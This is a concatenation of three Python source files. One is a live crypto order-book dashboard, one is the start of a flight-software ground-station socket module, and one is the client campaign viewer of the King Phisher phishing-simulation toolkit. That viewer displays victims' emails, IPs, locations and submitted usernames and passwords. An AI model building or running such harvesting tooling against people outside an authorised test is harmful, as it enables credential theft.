ask_trace['x'].append(vol)
ask_trace['y'].append(row['max_Price'])
ask_trace['text'].append(row['text'])
result = {
'data': [
go.Scatter(
x=data[TBL_VOLUME],
y=data[TBL_PRICE],
mode='markers',
text=data['text'],
opacity=0.95,
hoverinfo='text',
marker={
'size': data['sqrt'],
'line': {'width': 0.5, 'color': 'white'},
'color': data['color']
},
), ask_trace, bid_trace, go.Scatter(
x=ob_ask[TBL_VOLUME],
y=ob_ask[TBL_PRICE],
mode='lines',
opacity=0.5,
hoverinfo='text',
text=ob_ask['text'],
line=dict(color='rgb(255, 0, 0)', width=2)
),go.Scatter(
x=ob_bid[TBL_VOLUME],
y=ob_bid[TBL_PRICE],
mode='lines',
opacity=0.5,
hoverinfo='text',
text=ob_bid['text'],
line=dict(color='rgb(0, 255, 0)', width=2)
)
],
'layout': go.Layout(
# title automatically updates with refreshed market price
title=("The present market price of {} on {} is: {}{} at {}".format(ticker, exchange, symbol,
str(
marketPrice[combined]),
timeStamps[combined])),
xaxis=dict(title='Order Size', type='log', autotick=True,range=[log10(x_min*0.95), log10(x_max*1.03)]),
yaxis={'title': '{} Price'.format(ticker),'range':[market_price*0.94, market_price*1.06]},
hovermode='closest',
# now code to ensure the sizing is right
margin=go.Margin(
l=75, r=75,
b=50, t=50,
pad=4),
paper_bgcolor='#F5F5F5',
plot_bgcolor='#F5F5F5',
# adding the horizontal reference line at market price
shapes=shape_arr,
annotations=annot_arr,
showlegend=False
)
}
return result
def prepare_send():
lCache = []
cData = get_All_data()
for pair in PAIRS:
ticker = pair.ticker
exchange = pair.exchange
graph = 'live-graph-' + exchange + "-" + ticker
lCache.append(html.Br())
if (pair.Dataprepared):
lCache.append(dcc.Graph(
id=graph,
figure=cData[exchange + ticker]
))
else:
lCache.append(html.Div(id=graph))
return lCache
# links up the chart creation to the interval for an auto-refresh
# creates one callback per currency pairing; easy to replicate / add new pairs
@app.callback(Output('graphs_Container', 'children'),
events=[Event('main-interval-component', 'interval')])
def update_Site_data():
return getSendCache()
# Round x to 'sig' significant figures. A positive 'overwrite' forces that exact number of decimal places; 'minimum' is the smallest number of decimal places that will be used.
def round_sig(x, sig=3, overwrite=0, minimum=0):
if (x == 0):
return 0.0
elif overwrite > 0:
return round(x, overwrite)
else:
digits = -int(floor(log10(abs(x)))) + (sig - 1)
if digits <= minimum:
return round(x, minimum)
else:
return round(x, digits)
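# Illustrative examples (not part of the original app; values assume the defaults above):
#   round_sig(0.0004567)              -> 0.000457   (3 significant figures)
#   round_sig(1234.567)               -> 1235.0     (clamped to 'minimum' decimal places)
#   round_sig(1234.567, overwrite=2)  -> 1234.57    (fixed 2 decimal places)
#   round_sig(1234.567, 3, 0, 2)      -> 1234.57    (as called above with sig_use=2 for fiat pairs)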
# Map the number of unique orders at a price point to an RGB color intensity (fewer orders -> brighter), clamped to the range 30-255.
def calcColor(x):
response = round(400 / x)
if response > 255:
response = 255
elif response < 30:
response = 30
return response
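# Illustrative mapping (not part of the original app): the fewer unique orders behind a
# price point, the brighter the bubble is drawn.
#   calcColor(1)  -> 255   (a single huge order: brightest, likely a whale)
#   calcColor(5)  -> 80
#   calcColor(10) -> 40
#   calcColor(20) -> 30    (clamped to the floor of 30)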
def fixNan(x, pMin=True):
if isnan(x):
if pMin:
return 99999
else:
return 0
else:
return x
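# Illustrative examples (not part of the original app): the NaN placeholders keep the
# min()/max() aggregations in prepare_data() well defined when a table is empty.
#   fixNan(float('nan'))        -> 99999  (safe value when looking for a minimum)
#   fixNan(float('nan'), False) -> 0      (safe value when looking for a maximum)
#   fixNan(12.5)                -> 12.5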
def getStamp():
return int(round(time.time() * 1000))
# Watchdog: starts the server, preparer, web socket and recalc threads, then restarts any of them that stop running
def watchdog():
global PAIRS
tServer = threading.Thread(target=serverThread)
tServer.daemon = False
tServer.start()
time.sleep(3) # get Server start
log(2,"Server should be running now")
tPreparer = threading.Thread(target=sendPrepareThread)
tPreparer.daemon = False
tPreparer.start()
for pair in PAIRS:
pair.threadWebsocket = threading.Thread(
target=websockThread, args=(pair,))
pair.threadWebsocket.daemon = False
pair.threadWebsocket.start()
time.sleep(3)
log(2,"Web sockets up")
for pair in PAIRS:
pair.threadRecalc = threading.Thread(target=recalcThread, args=(pair,))
pair.threadRecalc.daemon = False
pair.threadRecalc.start()
time.sleep(2.5)
log(2,"ReCalc up")
for pair in PAIRS:
pair.threadPrepare = threading.Thread(
target=preparePairThread, args=(pair,))
pair.threadPrepare.daemon = False
pair.threadPrepare.start()
log(2,"Everything should be running now, starting Watchdog, to control the herd")
while True:
time.sleep(2)
alive = True
for pair in PAIRS:
if not pair.threadRecalc.isAlive():
alive = False
log(2,"Restarting pair Recalc " +
pair.exchange + " " + pair.ticker)
pair.threadRecalc = threading.Thread(
target=recalcThread, args=(pair,))
pair.threadRecalc.daemon = False
pair.threadRecalc.start()
if not pair.threadWebsocket.isAlive():
alive = False
log(2,"Restarting pair Web socket " +
pair.exchange + " " + pair.ticker)
pair.webSocketKill = 1
pair.threadWebsocket = threading.Thread(
target=websockThread, args=(pair,))
pair.threadWebsocket.daemon = False
pair.threadWebsocket.start()
if not pair.threadPrepare.isAlive():
alive = False
log(2,"Restarting pair Prepare worker " +
pair.exchange + " " + pair.ticker)
pair.threadPrepare = threading.Thread(
target=preparePairThread, args=(pair,))
pair.threadPrepare.daemon = False
pair.threadPrepare.start()
if not tServer.isAlive():
alive = False
log(3,"Watchdog detected dead Server, restarting")
tServer = threading.Thread(target=serverThread)
tServer.daemon = False
tServer.start()
if not tPreparer.isAlive():
alive = False
log(3,"Watchdog detected dead Preparer, restarting")
tPreparer = threading.Thread(target=sendPrepareThread)
tPreparer.daemon = False
tPreparer.start()
if not alive:
log(3,"Watchdog got some bad sheeps back to group")
def serverThread():
app.run_server(host='0.0.0.0', port=serverPort)
def sendPrepareThread():
global sendCache, first_prepare, overallNewData
while True:
sendCache = prepare_send()
overallNewData = False
time.sleep(0.5)
while not overallNewData:
time.sleep(0.5)
def recalcThread(pair):
count = 0
refreshes = 0
while True:
if (pair.websocket):
dif = getStamp() - pair.lastStamp
if dif > desiredPairRefresh:
log(1,"Ms Diff for " + pair.ticker + " is " + str(
dif) + " Total refreshes for pair " + str(refreshes))
refreshes += 1
if not calc_data(pair):
count = count + 1
else:
count = 0
pair.lastStamp = pair.usedStamp
if count > 5:
log(3,"Going to kill Web socket from " + pair.ticker)
count = -5
pair.webSocketKill = 0
else:
time.sleep((desiredPairRefresh - dif) / 1000)
def websockThread(pair):
pair.websocket = False
pair.ob_Inst = GDaxBook(pair.ticker)
time.sleep(5)
pair.websocket = True
while True:
kill = 5 / pair.webSocketKill  # intentionally raises ZeroDivisionError once webSocketKill is set to 0, so this thread dies and the watchdog restarts the web socket
time.sleep(4)
def preparePairThread(pair):
global prepared, overallNewData
ticker = pair.ticker
exc = pair.exchange
cbn = exc + ticker
while True:
if (pair.prepare):
prepared[cbn] = prepare_data(ticker, exc)
overallNewData = True
pair.Dataprepared = True
while not pair.newData:
time.sleep(0.2)
def handleArgs(argv):
global serverPort, debugLevel, desiredPairRefresh
try:
opts, args = getopt.getopt(
argv, "hp:d:", ["port=","debug=","pRefresh="])
except getopt.GetoptError:
print('app.py -h')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('Usage: app.py --port <port> --debug <level> --pRefresh <ms>')
print('--pRefresh sets the pair refresh rate in milliseconds')
sys.exit()
elif opt in ("-p", "--port"):
serverPort = int(arg)
elif opt in ("-d", "--debug"):
debugLevel = int(arg)
elif opt in ("--pRefresh"):
desiredPairRefresh = int(arg)
log(4,"Legend: This is an error message")
log(3,"Legend: This is a warning message")
log(2,"Legend: This is an info message")
log(1,"Legend: This is a debug message")
log(0,"Legend: This is a deep debug message")
log(1,'Web Interface Port is ' + str(serverPort))
log(1,'Debug Level is ' + str(debugLevel))
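# Example invocation (hypothetical values, not part of the original app):
#   python app.py --port 8050 --debug 1 --pRefresh 20000
# which serves the dashboard on port 8050 and refreshes each pair roughly every 20 seconds.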
def log(pLevel, pMessage):
if pLevel >= debugLevel:
text = (str(datetime.now()) + " [" +
debugLevels[pLevel] +
"]: " + str(pMessage))
open("log.txt","a").write(text + "\n")
print(debugColors[pLevel] + text + '\033[0m')
if __name__ == '__main__':
# Initial Load of Data
handleArgs(sys.argv[1:])
watchdog()
|
campaign.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/client/tabs/campaign.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import datetime
import logging
import threading
import time
from king_phisher import find
from king_phisher import ipaddress
from king_phisher import utilities
from king_phisher.client import export
from king_phisher.client import graphs
from king_phisher.client import gui_utilities
from king_phisher.client.widget import extras
from king_phisher.client.widget import managers
from gi.repository import GdkPixbuf
from gi.repository import GLib
from gi.repository import Gtk
from smoke_zephyr.utilities import parse_timespan
UNKNOWN_LOCATION_STRING = 'N/A (Unknown)'
class CampaignViewGenericTab(gui_utilities.GladeGObject):
"""
This object is meant to be subclassed by all of the tabs which load and
display information about the current campaign.
"""
label_text = 'Unknown'
"""The label of the tab for display in the GUI."""
top_gobject = 'box'
def __init__(self, *args, **kwargs):
super(CampaignViewGenericTab, self).__init__(*args, **kwargs)
self.label = Gtk.Label(label=self.label_text)
"""The :py:class:`Gtk.Label` representing this tab with text from :py:attr:`~.CampaignViewGenericTab.label_text`."""
self.is_destroyed = threading.Event()
getattr(self, self.top_gobject).connect('destroy', self.signal_destroy)
self.last_load_time = float('-inf')
"""The last time the data was loaded from the server."""
self.refresh_frequency = parse_timespan(str(self.config.get('gui.refresh_frequency', '5m')))
"""The lifetime in seconds to wait before refreshing the data from the server."""
self.loader_thread = None
"""The thread object which loads the data from the server."""
self.loader_thread_lock = threading.Lock()
"""The :py:class:`threading.Lock` object used for synchronization between the loader and main threads."""
self.loader_thread_stop = threading.Event()
"""The :py:class:`threading.Event` object used to request that the loader thread stop before completion."""
self.application.connect('campaign-set', self.signal_kpc_campaign_set)
def _sync_loader_thread(self):
"""
Synchronize the loader thread by ensuring that it is stopped. If it is
currently running, this will use :py:attr:`~.loader_thread_stop` to
request that the loader stops early.
"""
if not self.loader_thread_is_running:
return
# it's alive so tell it to stop, wait for it, then proceed
self.loader_thread_stop.set()
while self.loader_thread.is_alive():
gui_utilities.gtk_sync()
self.loader_thread.join(1)
@property
def rpc(self):
return self.application.rpc
@property
def loader_thread_is_running(self):
if self.loader_thread is None:
return False
return self.loader_thread.is_alive()
def load_campaign_information(self, force=True):
raise NotImplementedError()
def signal_button_clicked_refresh(self, button):
self.load_campaign_information()
def signal_destroy(self, gobject):
self.is_destroyed.set()
self.loader_thread_stop.set()
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
self.logger.debug("waiting on thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
while self.loader_thread.is_alive():
gui_utilities.gtk_sync()
self.logger.debug("joined thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
def signal_kpc_campaign_set(self, kpc, cid):
self.load_campaign_information()
class CampaignViewGenericTableTab(CampaignViewGenericTab):
"""
This object is meant to be subclassed by tabs which will display
campaign information of different types from specific database
tables. The data in this object is refreshed when multiple events
occur and it uses an internal timer to represent the last time the
data was refreshed.
"""
dependencies = gui_utilities.GladeDependencies(
children=(
'button_refresh',
'treeview_campaign'
)
)
node_query = None
"""
The GraphQL query used to load a particular node from the remote table.
This query is provided with a single parameter of the node's id.
"""
table_name = ''
"""The database table represented by this tab."""
table_query = None
"""
The GraphQL query used to load the desired information from the remote
table. This query is provided with the following three parameters:
campaign, count and cursor.
"""
view_columns = ()
"""The dictionary map of column numbers to column names starting at column 1."""
xlsx_worksheet_options = None
def __init__(self, *args, **kwargs):
super(CampaignViewGenericTableTab, self).__init__(*args, **kwargs)
treeview = self.gobjects['treeview_campaign']
self.treeview_manager = managers.TreeViewManager(
treeview,
selection_mode=Gtk.SelectionMode.MULTIPLE,
cb_delete=self._prompt_to_delete_row,
cb_refresh=self.load_campaign_information
)
self.treeview_manager.set_column_titles(self.view_columns, column_offset=1)
self.popup_menu = self.treeview_manager.get_popup_menu()
"""The :py:class:`Gtk.Menu` object which is displayed when right-clicking in the view area."""
treeview = self.gobjects['treeview_campaign']
store_columns = [str] * (len(self.view_columns) + 1)
store = Gtk.ListStore(*store_columns)
treeview.set_model(store)
self.application.connect('server-connected', self.signal_kp_server_connected)
def signal_kp_server_connected(self, _):
event_id = 'db-' + self.table_name.replace('_', '-')
server_events = self.application.server_events
server_events.subscribe(event_id, ('deleted', 'inserted', 'updated'), ('id', 'campaign_id'))
server_events.connect(event_id, self.signal_server_event_db)
def signal_server_event_db(self, _, event_type, rows):
get_node = lambda id: self.rpc.graphql(self.node_query, {'id': str(id)})['db']['node']
for row in rows:
if str(row.campaign_id) != self.config['campaign_id']:
continue
model = self.gobjects['treeview_campaign'].get_model()
for case in utilities.switch(event_type):
if case('inserted'):
row_data = self.format_node_data(get_node(row.id))
row_data = list(map(self.format_cell_data, row_data))
row_data.insert(0, str(row.id))
gui_utilities.glib_idle_add_wait(model.append, row_data)
if case('deleted'):
ti = gui_utilities.gtk_list_store_search(model, str(row.id))
if ti is not None:
model.remove(ti)
break
if case('updated'):
row_data = self.format_node_data(get_node(row.id))
ti = gui_utilities.gtk_list_store_search(model, str(row.id))
for idx, cell_data in enumerate(row_data, 1):
model[ti][idx] = self.format_cell_data(cell_data)
break
def _prompt_to_delete_row(self, treeview, _):
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
gui_utilities.show_dialog_warning('Can Not Delete Rows While Loading', self.parent)
return
model = treeview.get_model()
row_ids = [model.get_value(ti, 0) for ti in gui_utilities.gtk_treeview_selection_iterate(treeview)]
if len(row_ids) == 0:
return
elif len(row_ids) == 1:
message = 'Delete This Row?'
else:
message = "Delete These {0:,} Rows?".format(len(row_ids))
if not gui_utilities.show_dialog_yes_no(message, self.parent, 'This information will be lost.'):
return
self.application.emit(self.table_name[:-1] + '-delete', row_ids)
def format_node_data(self, node):
"""
This method is overridden by subclasses to format the raw node
data returned from the server. The length of the list must equal
the number of columns in the table. This method is called for
each node in the remote table by the loader thread.
:param dict node: The node from a GraphQL query representing data for this table.
:return: The formatted row data.
:rtype: list
"""
raise NotImplementedError()
def format_cell_data(self, cell_data, encoding='utf-8'):
"""
This method provides formatting to the individual cell values returned
from the :py:meth:`.format_node_data` method. Values are converted into
a format suitable for reading.
:param cell_data: The value to format.
:param str encoding: The encoding to use to coerce the return value into a unicode string.
:return: The formatted cell value.
:rtype: str
"""
if isinstance(cell_data, datetime.datetime):
cell_data = utilities.datetime_utc_to_local(cell_data)
return utilities.format_datetime(cell_data, encoding=encoding)
if cell_data is None:
cell_data = ''
elif isinstance(cell_data, int):
cell_data = str(cell_data)
# ensure that the return value is a unicode string
if isinstance(cell_data, bytes):
cell_data = cell_data.decode(encoding)
return cell_data
def load_campaign_information(self, force=True):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the
:py:attr:`~.CampaignViewGenericTab.last_load_time` is compared
with the :py:attr:`~.CampaignViewGenericTab.refresh_frequency` to
check if the information is stale. If the local data is not stale,
this function will return without updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
self.loader_thread_lock.acquire()
self._sync_loader_thread()
self.loader_thread_stop.clear()
store = self.gobjects['treeview_campaign'].get_model()
store.clear()
self.loader_thread = threading.Thread(target=self.loader_thread_routine, args=(store,))
self.loader_thread.daemon = True
self.loader_thread.start()
self.loader_thread_lock.release()
return
def loader_thread_routine(self, store):
"""
The loading routine to be executed within a thread.
:param store: The store object to place the new data.
:type store: :py:class:`Gtk.ListStore`
"""
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', False))
campaign_id = self.config['campaign_id']
count = 500
page_info = {'endCursor': None, 'hasNextPage': True}
while page_info['hasNextPage']:
if self.rpc is None:
break
results = self.rpc.graphql(self.table_query, {'campaign': campaign_id, 'count': count, 'cursor': page_info['endCursor']})
if self.loader_thread_stop.is_set():
break
if self.is_destroyed.is_set():
break
for edge in results['db']['campaign'][self.table_name]['edges']:
row_data = self.format_node_data(edge['node'])
row_data = list(map(self.format_cell_data, row_data))
row_data.insert(0, str(edge['node']['id']))
gui_utilities.glib_idle_add_wait(store.append, row_data)
page_info = results['db']['campaign'][self.table_name]['pageInfo']
if self.is_destroyed.is_set():
return
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', True))
self.last_load_time = time.time()
def signal_button_clicked_export(self, button):
self.export_table_to_csv()
def export_table_to_csv(self):
"""Export the data represented by the view to a CSV file."""
if not self.loader_thread_lock.acquire(False) or (isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive()):
gui_utilities.show_dialog_warning('Can Not Export Rows While Loading', self.parent)
return
dialog = extras.FileChooserDialog('Export Data', self.parent)
file_name = self.config['campaign_name'] + '.csv'
response = dialog.run_quick_save(file_name)
dialog.destroy()
if not response:
self.loader_thread_lock.release()
return
destination_file = response['target_path']
store = self.gobjects['treeview_campaign'].get_model()
columns = dict(enumerate(('UID',) + self.view_columns))
export.liststore_to_csv(store, destination_file, columns)
self.loader_thread_lock.release()
def export_table_to_xlsx_worksheet(self, worksheet, title_format):
"""
Export the data represented by the view to an XLSX worksheet.
:param worksheet: The destination sheet for the store's data.
:type worksheet: :py:class:`xlsxwriter.worksheet.Worksheet`
:param title_format: The formatting to use for the title row.
:type title_format: :py:class:`xlsxwriter.format.Format`
"""
if not self.loader_thread_lock.acquire(False) or (isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive()):
gui_utilities.show_dialog_warning('Can Not Export Rows While Loading', self.parent)
return
store = self.gobjects['treeview_campaign'].get_model()
columns = dict(enumerate(('UID',) + self.view_columns))
export.liststore_to_xlsx_worksheet(store, worksheet, columns, title_format, xlsx_options=self.xlsx_worksheet_options)
self.loader_thread_lock.release()
class CampaignViewDeaddropTab(CampaignViewGenericTableTab):
"""Display campaign information regarding dead drop connections."""
table_name = 'deaddrop_connections'
label_text = 'Deaddrop'
node_query = """\
query getDeaddropConnection($id: String!) {
db {
node: deaddropConnection(id: $id) {
id
deaddropDeployment { destination }
visitCount
visitorIp
localUsername
localHostname
localIpAddresses
firstVisit
lastVisit
}
}
}
"""
table_query = """\
query getDeaddropConnections($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
deaddropConnections(first: $count, after: $cursor) {
total
edges {
node {
id
deaddropDeployment { destination }
visitCount
visitorIp
localUsername
localHostname
localIpAddresses
firstVisit
lastVisit
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Destination',
'Visit Count',
'IP Address',
'Username',
'Hostname',
'Local IP Addresses',
'First Hit',
'Last Hit'
)
def format_node_data(self, node):
# The node is a GraphQL result dict (see node_query above), so fields are accessed by key,
# matching how the other table tabs handle their nodes.
deployment = node['deaddropDeployment']
row = (
deployment['destination'] if deployment else None,
node['visitCount'],
node['visitorIp'],
node['localUsername'],
node['localHostname'],
node['localIpAddresses'],
node['firstVisit'],
node['lastVisit']
)
return row
class CampaignViewCredentialsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding submitted credentials."""
table_name = 'credentials'
label_text = 'Credentials'
node_query = """\
query getCredential($id: String!) {
db {
node: credential(id: $id) {
id
message { targetEmail }
username
password
submitted
}
}
}
"""
table_query = """\
query getCredentials($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
credentials(first: $count, after: $cursor) {
total
edges {
node {
id
message { targetEmail }
username
password
submitted
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Email Address',
'Username',
'Password',
'Submitted'
)
xlsx_worksheet_options = export.XLSXWorksheetOptions(
column_widths=(20, 30, 30, 30, 25),
title=label_text
)
def __init__(self, *args, **kwargs):
super(CampaignViewCredentialsTab, self).__init__(*args, **kwargs)
treeview = self.gobjects['treeview_campaign']
pwd_column_id = self.view_columns.index('Password')
treeview.get_column(pwd_column_id).set_property('visible', False)
def format_node_data(self, node):
row = (
node['message']['targetEmail'],
node['username'],
node['password'],
node['submitted']
)
return row
def signal_button_toggled_show_passwords(self, button):
treeview = self.gobjects['treeview_campaign']
pwd_column_id = self.view_columns.index('Password')
treeview.get_column(pwd_column_id).set_property('visible', button.get_property('active'))
class CampaignViewDashboardTab(CampaignViewGenericTab):
"""Display campaign information on a graphical dash board."""
dependencies = gui_utilities.GladeDependencies(
children=(
'box_top_left',
'box_top_right',
'box_bottom',
'scrolledwindow_top_left',
'scrolledwindow_top_right',
'scrolledwindow_bottom'
)
)
label_text = 'Dashboard'
"""The tabs label for display in the GUI."""
def __init__(self, *args, **kwargs):
super(CampaignViewDashboardTab, self).__init__(*args, **kwargs)
self.graphs = []
"""The :py:class:`.CampaignGraph` classes represented on the dash board."""
dash_ports = {
# dashboard position, (width, height)
'top_left': (380, 200),
'top_right': (380, 200),
'bottom': (760, 200)
}
for dash_port, details in dash_ports.items():
graph_name = self.config['dashboard.' + dash_port]
cls = graphs.get_graph(graph_name)
if not cls:
self.logger.warning('could not get graph: ' + graph_name)
logo_file_path = find.data_file('king-phisher-icon.svg')
if logo_file_path:
image = Gtk.Image.new_from_pixbuf(GdkPixbuf.Pixbuf.new_from_file_at_size(logo_file_path, 128, 128))
image.show()
self.gobjects['scrolledwindow_' + dash_port].add(image)
continue
graph_inst = cls(self.application, details, getattr(self, self.top_gobject).get_style_context())
self.gobjects['scrolledwindow_' + dash_port].add(graph_inst.canvas)
self.gobjects['box_' + dash_port].pack_end(graph_inst.navigation_toolbar, False, False, 0)
self.graphs.append(graph_inst)
self.logger.debug("dashboard refresh frequency set to {0} seconds".format(self.refresh_frequency))
GLib.timeout_add_seconds(self.refresh_frequency, self.loader_idle_routine)
def load_campaign_information(self, force=True):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the :py:attr:`~.last_load_time` is compared with
the :py:attr:`~.refresh_frequency` to check if the information is stale.
If the local data is not stale, this function will return without
updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
if not self.application.rpc:
self.logger.warning('skipping load_campaign_information because rpc is not initialized')
return
with self.loader_thread_lock:
self._sync_loader_thread()
self.loader_thread_stop.clear()
self.loader_thread = threading.Thread(target=self.loader_thread_routine)
self.loader_thread.daemon = True
self.loader_thread.start()
def loader_idle_routine(self):
"""The routine which refreshes the campaign data at a regular interval."""
if self.rpc and not self.loader_thread_is_running:
self.logger.debug('idle loader routine called')
self.load_campaign_information()
return True
def loader_thread_routine(self):
"""The loading routine to be executed within a thread."""
if 'campaign_id' not in self.config:
return
if not self.rpc.remote_table_row('campaigns', self.config['campaign_id']):
return
info_cache = {}
for graph in self.graphs:
if self.loader_thread_stop.is_set():
break
if self.is_destroyed.is_set():
break
info_cache.update(gui_utilities.glib_idle_add_wait(lambda g=graph: g.refresh(info_cache, self.loader_thread_stop)))
else:
self.last_load_time = time.time()
class CampaignViewVisitsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding incoming visitors."""
table_name = 'visits'
label_text = 'Visits'
node_query = """\
query getVisit($id: String!) {
db {
node: visit(id: $id) {
id
message { targetEmail }
visitorIp
visitCount
visitorDetails
visitorGeoloc { city }
firstVisit
lastVisit
}
}
}
"""
table_query = """\
query getVisits($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
visits(first: $count, after: $cursor) {
total
edges {
node {
id
message { targetEmail }
visitorIp
visitCount
visitorDetails
visitorGeoloc { city }
firstVisit
lastVisit
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Email Address',
'IP Address',
'Visit Count',
'Visitor User Agent',
'Visitor Location',
'First Visit',
'Last Visit'
)
xlsx_worksheet_options = export.XLSXWorksheetOptions(
column_widths=(30, 30, 25, 15, 90, 30, 25, 25),
title=label_text
)
def format_node_data(self, node):
geo_location = UNKNOWN_LOCATION_STRING
visitor_ip = node['visitorIp']
if visitor_ip is None:
visitor_ip = ''
else:
visitor_ip = ipaddress.ip_address(visitor_ip)
if visitor_ip.is_loopback:
geo_location = 'N/A (Loopback)'
elif visitor_ip.is_private:
geo_location = 'N/A (Private)'
elif isinstance(visitor_ip, ipaddress.IPv6Address):
geo_location = 'N/A (IPv6 Address)'
elif node['visitorGeoloc']:
geo_location = node['visitorGeoloc']['city']
row = (
node['message']['targetEmail'],
str(visitor_ip),
node['visitCount'],
node['visitorDetails'],
geo_location,
node['firstVisit'],
node['lastVisit']
)
return row
class CampaignViewMessagesTab(CampaignViewGenericTableTab):
"""Display campaign information regarding sent messages."""
table_name = 'messages'
label_text = 'Messages'
node_query = """\
query getMessage($id: String!) {
db {
node: message(id: $id) {
id
targetEmail
sent
trained
companyDepartment { name }
opened
openerIp
openerUserAgent
}
}
}
"""
table_query = """\
query getMessages($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
messages(first: $count, after: $cursor) {
total
edges {
node {
id
targetEmail
sent
trained
companyDepartment { name }
opened
openerIp
openerUserAgent
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Email Address',
'Sent',
'Trained',
'Department',
'Opened',
'Opener IP Address',
'Opener User Agent'
)
xlsx_worksheet_options = export.XLSXWorksheetOptions(
column_widths=(30, 30, 30, 15, 20, 20, 25, 90),
title=label_text
)
def format_node_data(self, node):
department = node['companyDepartment']
if department:
department = department['name']
row = (
node['targetEmail'],
node['sent'],
('Yes' if node['trained'] else ''),
department,
node['opened'],
node['openerIp'],
node['openerUserAgent']
)
return row
class CampaignViewTab(object):
"""
The King Phisher client top-level 'View Campaign' tab. This object
manages the sub-tabs which display all the information regarding
the current campaign.
"""
def __init__(self, parent, application):
"""
:param parent: The parent window for this object.
:type parent: :py:class:`Gtk.Window`
:param application: The main client application instance.
:type application: :py:class:`Gtk.Application`
"""
self.parent = parent
self.application = application
self.config = application.config
self.logger = logging.getLogger('KingPhisher.Client.' + self.__class__.__name__)
self.box = Gtk.Box()
self.box.set_property('orientation', Gtk.Orientation.VERTICAL)
self.box.show()
self.label = Gtk.Label(label='View Campaign')
"""The :py:class:`Gtk.Label` representing this tabs name."""
self.notebook = Gtk.Notebook()
""" The :py:class:`Gtk.Notebook` for holding sub-tabs."""
self.notebook.connect('switch-page', self.signal_notebook_switch_page)
self.notebook.set_scrollable(True)
self.box.pack_start(self.notebook, True, True, 0)
self.tabs = utilities.FreezableDict()
"""A dict object holding the sub tabs managed by this object."""
current_page = self.notebook.get_current_page()
self.last_page_id = current_page
if graphs.has_matplotlib:
self.logger.info('matplotlib is installed, dashboard will be available')
dashboard_tab = CampaignViewDashboardTab(application)
self.tabs['dashboard'] = dashboard_tab
self.notebook.append_page(dashboard_tab.box, dashboard_tab.label)
else:
self.logger.warning('matplotlib is not installed, dashboard will not be available')
messages_tab = CampaignViewMessagesTab(application)
self.tabs['messages'] = messages_tab
self.notebook.append_page(messages_tab.box, messages_tab.label)
visits_tab = CampaignViewVisitsTab(application)
self.tabs['visits'] = visits_tab
self.notebook.append_page(visits_tab.box, visits_tab.label)
credentials_tab = CampaignViewCredentialsTab(application)
self.tabs['credentials'] = credentials_tab
self.notebook.append_page(credentials_tab.box, credentials_tab.label)
if self.config.get('gui.show_deaddrop', False):
deaddrop_connections_tab = CampaignViewDeaddropTab(application)
self.tabs['deaddrop_connections'] = deaddrop_connections_tab
self.notebook.append_page(deaddrop_connections_tab.box, deaddrop_connections_tab.label)
self.tabs.freeze()
for tab in self.tabs.values():
tab.box.show()
self.notebook.show()
def signal_notebook_switch_page(self, notebook, current_page, index):
if not hasattr(self.parent, 'rpc'):
return
#previous_page = notebook.get_nth_page(self.last_page_id)
self.last_page_id = index
for tab in self.tabs.values():
if current_page != tab.box:
continue
if hasattr(tab, 'load_campaign_information'):
tab.load_campaign_information(force=False)
|
client_socket.py
|
# TODO documentation
from __future__ import print_function
import sys
import socket
import threading
import select
from fprime_gds.common.handlers import DataHandler
from fprime.constants import DATA_ENCODING
# Constants for public use
GUI_TAG = "GUI"
